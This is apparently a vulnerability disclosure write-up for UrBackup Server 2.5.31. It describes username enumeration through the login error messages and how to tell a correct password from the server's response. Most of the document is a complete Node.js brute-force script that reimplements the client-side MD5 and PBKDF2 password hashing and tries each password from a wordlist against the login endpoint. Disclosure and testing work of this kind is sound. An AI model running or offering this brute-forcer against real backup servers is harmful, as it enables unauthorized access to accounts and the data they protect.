UrBackup Server 2.5.31 allows brute-force enumeration of user accounts because a failure message confirms that a username is not valid.

Starting with the first step, access the login page at localhost:55414. The login page includes fields for username and password, and it lacks captcha or any other controls to prevent automated form submissions. We observed that this allows perpetrators to brute-force the login request.

Next, we begin to understand how UrBackup works. We first try using the username "root". The result shows that "User does not exist". From this, we can easily deduce that this user does not exist.

We then try using a common username credential that might be used by most administrators, which can be found here. If we are lucky, the admin might be using one of the existing usernames from the wordlist similar to my demonstration, which shows that the username "admin" exists; however, the popup indicates "Wrong password".

The first request is sent to /x?a=salt and the response contains a cryptographic setting

The cryptographic JavaScript function that performs a password calculation is located on the client side.

1\. Prepare a list of existing usernames (in this case "admin")

2\. Prepare a password wordlist (in this case is "pass.txt")

3\. Run below code to automate brute-force

    
    
    import axios from 'axios';
    import fs from 'fs/promises';
    import qs from 'qs';  
    import sjcl from 'sjcl';
    import { HttpProxyAgent } from 'http-proxy-agent';
    
                   const proxyAgent = new HttpProxyAgent('http://127.0.0.1:8080');
    var blks = null;
    var nblk = null;
    var i = null;
    var x = null;
    var a = null;
    var b = null;
    var c = null;
    var d = null;
    var olda = null;
    var oldb = null;
    var oldc = null;
    var oldd = null;
    var str = null;
    var j = null;
    var hex_chr = "0123456789abcdef";
    function rhex(num)
    {
      str = "";
      for(j = 0; j <= 3; j++)
        str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) +
               hex_chr.charAt((num >> (j * 8)) & 0x0F);
      return str;
    }
    function str2blks_MD5(str)
    {
      nblk = ((str.length + 8) >> 6) + 1;
      blks = new Array(nblk * 16);
      for(i = 0; i < nblk * 16; i++) blks[i] = 0;
      for(i = 0; i < str.length; i++)
        blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
      blks[i >> 2] |= 0x80 << ((i % 4) * 8);
      blks[nblk * 16 - 2] = str.length * 8;
      return blks;
    }
    function add(x, y)
    {
      var lsw = (x & 0xFFFF) + (y & 0xFFFF);
      var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
      return (msw << 16) | (lsw & 0xFFFF);
    }
    function rol(num, cnt)
    {
      return (num << cnt) | (num >>> (32 - cnt));
    }
    function cmn(q, a, b, x, s, t)
    {
      return add(rol(add(add(a, q), add(x, t)), s), b);
    }
    function ff(a, b, c, d, x, s, t)
    {
      return cmn((b & c) | ((~b) & d), a, b, x, s, t);
    }
    function gg(a, b, c, d, x, s, t)
    {
      return cmn((b & d) | (c & (~d)), a, b, x, s, t);
    }
    function hh(a, b, c, d, x, s, t)
    {
      return cmn(b ^ c ^ d, a, b, x, s, t);
    }
    function ii(a, b, c, d, x, s, t)
    {
      return cmn(c ^ (b | (~d)), a, b, x, s, t);
    }
    function calcMD5(str)
    {
      x = str2blks_MD5(str);
      a =  1732584193;
      b = -271733879;
      c = -1732584194;
      d =  271733878;
      for(i = 0; i < x.length; i += 16)
      {
        olda = a;
        oldb = b;
        oldc = c;
        oldd = d;
        a = ff(a, b, c, d, x[i+ 0], 7 , -680876936);
        d = ff(d, a, b, c, x[i+ 1], 12, -389564586);
        c = ff(c, d, a, b, x[i+ 2], 17,  606105819);
        b = ff(b, c, d, a, x[i+ 3], 22, -1044525330);
        a = ff(a, b, c, d, x[i+ 4], 7 , -176418897);
        d = ff(d, a, b, c, x[i+ 5], 12,  1200080426);
        c = ff(c, d, a, b, x[i+ 6], 17, -1473231341);
        b = ff(b, c, d, a, x[i+ 7], 22, -45705983);
        a = ff(a, b, c, d, x[i+ 8], 7 ,  1770035416);
        d = ff(d, a, b, c, x[i+ 9], 12, -1958414417);
        c = ff(c, d, a, b, x[i+10], 17, -42063);
        b = ff(b, c, d, a, x[i+11], 22, -1990404162);
        a = ff(a, b, c, d, x[i+12], 7 ,  1804603682);
        d = ff(d, a, b, c, x[i+13], 12, -40341101);
        c = ff(c, d, a, b, x[i+14], 17, -1502002290);
        b = ff(b, c, d, a, x[i+15], 22,  1236535329);    
        a = gg(a, b, c, d, x[i+ 1], 5 , -165796510);
        d = gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
        c = gg(c, d, a, b, x[i+11], 14,  643717713);
        b = gg(b, c, d, a, x[i+ 0], 20, -373897302);
        a = gg(a, b, c, d, x[i+ 5], 5 , -701558691);
        d = gg(d, a, b, c, x[i+10], 9 ,  38016083);
        c = gg(c, d, a, b, x[i+15], 14, -660478335);
        b = gg(b, c, d, a, x[i+ 4], 20, -405537848);
        a = gg(a, b, c, d, x[i+ 9], 5 ,  568446438);
        d = gg(d, a, b, c, x[i+14], 9 , -1019803690);
        c = gg(c, d, a, b, x[i+ 3], 14, -187363961);
        b = gg(b, c, d, a, x[i+ 8], 20,  1163531501);
        a = gg(a, b, c, d, x[i+13], 5 , -1444681467);
        d = gg(d, a, b, c, x[i+ 2], 9 , -51403784);
        c = gg(c, d, a, b, x[i+ 7], 14,  1735328473);
        b = gg(b, c, d, a, x[i+12], 20, -1926607734);
        
        a = hh(a, b, c, d, x[i+ 5], 4 , -378558);
        d = hh(d, a, b, c, x[i+ 8], 11, -2022574463);
        c = hh(c, d, a, b, x[i+11], 16,  1839030562);
        b = hh(b, c, d, a, x[i+14], 23, -35309556);
        a = hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
        d = hh(d, a, b, c, x[i+ 4], 11,  1272893353);
        c = hh(c, d, a, b, x[i+ 7], 16, -155497632);
        b = hh(b, c, d, a, x[i+10], 23, -1094730640);
        a = hh(a, b, c, d, x[i+13], 4 ,  681279174);
        d = hh(d, a, b, c, x[i+ 0], 11, -358537222);
        c = hh(c, d, a, b, x[i+ 3], 16, -722521979);
        b = hh(b, c, d, a, x[i+ 6], 23,  76029189);
        a = hh(a, b, c, d, x[i+ 9], 4 , -640364487);
        d = hh(d, a, b, c, x[i+12], 11, -421815835);
        c = hh(c, d, a, b, x[i+15], 16,  530742520);
        b = hh(b, c, d, a, x[i+ 2], 23, -995338651);
        a = ii(a, b, c, d, x[i+ 0], 6 , -198630844);
        d = ii(d, a, b, c, x[i+ 7], 10,  1126891415);
        c = ii(c, d, a, b, x[i+14], 15, -1416354905);
        b = ii(b, c, d, a, x[i+ 5], 21, -57434055);
        a = ii(a, b, c, d, x[i+12], 6 ,  1700485571);
        d = ii(d, a, b, c, x[i+ 3], 10, -1894986606);
        c = ii(c, d, a, b, x[i+10], 15, -1051523);
        b = ii(b, c, d, a, x[i+ 1], 21, -2054922799);
        a = ii(a, b, c, d, x[i+ 8], 6 ,  1873313359);
        d = ii(d, a, b, c, x[i+15], 10, -30611744);
        c = ii(c, d, a, b, x[i+ 6], 15, -1560198380);
        b = ii(b, c, d, a, x[i+13], 21,  1309151649);
        a = ii(a, b, c, d, x[i+ 4], 6 , -145523070);
        d = ii(d, a, b, c, x[i+11], 10, -1120210379);
        c = ii(c, d, a, b, x[i+ 2], 15,  718787259);
        b = ii(b, c, d, a, x[i+ 9], 21, -343485551);
        a = add(a, olda);
        b = add(b, oldb);
        c = add(c, oldc);
        d = add(d, oldd);
      }
      console.log(rhex(a) + rhex(b) + rhex(c) + rhex(d));
      return rhex(a) + rhex(b) + rhex(c) + rhex(d);
    }
    
    const main = async () => {
        try {
            const passwords = await fs.readFile('pass.txt', 'utf8');
            const passwordArray = passwords.split('\n').map(pw => pw.trim());
            for (const password of passwordArray) {
                console.log(password)
              
                const url1 = 'http://localhost:55414/x?a=salt';
                const data1 = qs.stringify({
                    username: 'admin',
                    ses: '4Eu9JKihHNT6CH8esJQ0mn3ga9G7vJ',
                    lang: 'en'
                });
                const response1 = await axios.post(url1, data1, {
                    headers: {
                        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
                        "Accept": "application/json, text/javascript, */*; q=0.01",
                        "Accept-Language": "en-US,en;q=0.5",
                        "Accept-Encoding": "gzip, deflate",
                        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                        "X-Requested-With": "XMLHttpRequest",
                        "Origin": "http://localhost:55414",
                        "Referer": "http://localhost:55414"
                    },httpAgent: proxyAgent,  
                    httpsAgent: proxyAgent 
                });
                console.log(response1.data);
                const { rnd, salt, ses } = response1.data;
                if (!rnd || !salt) {
                    console.log('Failed to retrieve rnd or salt');
                    continue;
                }
    
                let pwmd5 = calcMD5(salt + password);
                if (10000 > 0) {
                    pwmd5 = sjcl.codec.hex.fromBits(sjcl.misc.pbkdf2(sjcl.codec.hex.toBits(pwmd5), salt, 10000));
                }
                pwmd5 = calcMD5(rnd + pwmd5); 
                const url2 = 'http://localhost:55414/x?a=login';
                const data2 = {
                    username: 'admin',
                    password: pwmd5,
                    ses: ses || '4Eu9JKihHNT6CH8esJQ0mn3ga9G7vJ',
                    lang: 'en'
                };
                
                const response2 = await axios.post(url2, qs.stringify(data2), {  
                    headers: {
                        "Accept": "application/json, text/javascript, */*; q=0.01",
                        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",  
                        "sec-ch-ua": '"Not;A Brand";v="99", "Chromium";v="106"',
                        "X-Requested-With": "XMLHttpRequest",
                        "sec-ch-ua-mobile": "?0",
                        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36",
                        "sec-ch-ua-platform": '"Windows"',
                        "Origin": "http://localhost:55414",
                        "Sec-Fetch-Site": "same-origin",
                        "Sec-Fetch-Mode": "cors",
                        "Sec-Fetch-Dest": "empty",
                        "Referer": "http://localhost:55414/",
                        "Accept-Encoding": "gzip, deflate",
                        "Accept-Language": "en-US,en;q=0.9",
                        "Connection": "close"
                    },httpAgent: proxyAgent,  
                    httpsAgent: proxyAgent 
                });
                
                console.log(response2.data);
            }
        } catch (error) {
            console.error('An error occurred:', error);
        }
    };
    main();
    
                   
                

All requests made by the automation script.

An incorrect hash password will return a JSON with an error type of 2.

A correct hash password will return attributes of the settings, and the response length will be different.

Tag

#linux